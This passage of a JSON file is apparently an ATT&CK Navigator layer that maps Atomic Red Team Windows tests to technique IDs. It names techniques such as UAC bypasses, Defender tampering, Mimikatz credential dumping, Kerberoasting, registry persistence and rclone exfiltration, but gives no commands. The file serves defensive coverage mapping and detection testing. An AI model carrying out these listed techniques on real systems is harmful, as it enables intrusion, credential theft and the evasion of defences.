(Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":1,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":4,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":5,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":23,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":13,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":29,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n"},{"techniqueID":"T1564.001","score":3,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":1,"enabled":true,"comment":"\n- Hidden Window\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":4,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View 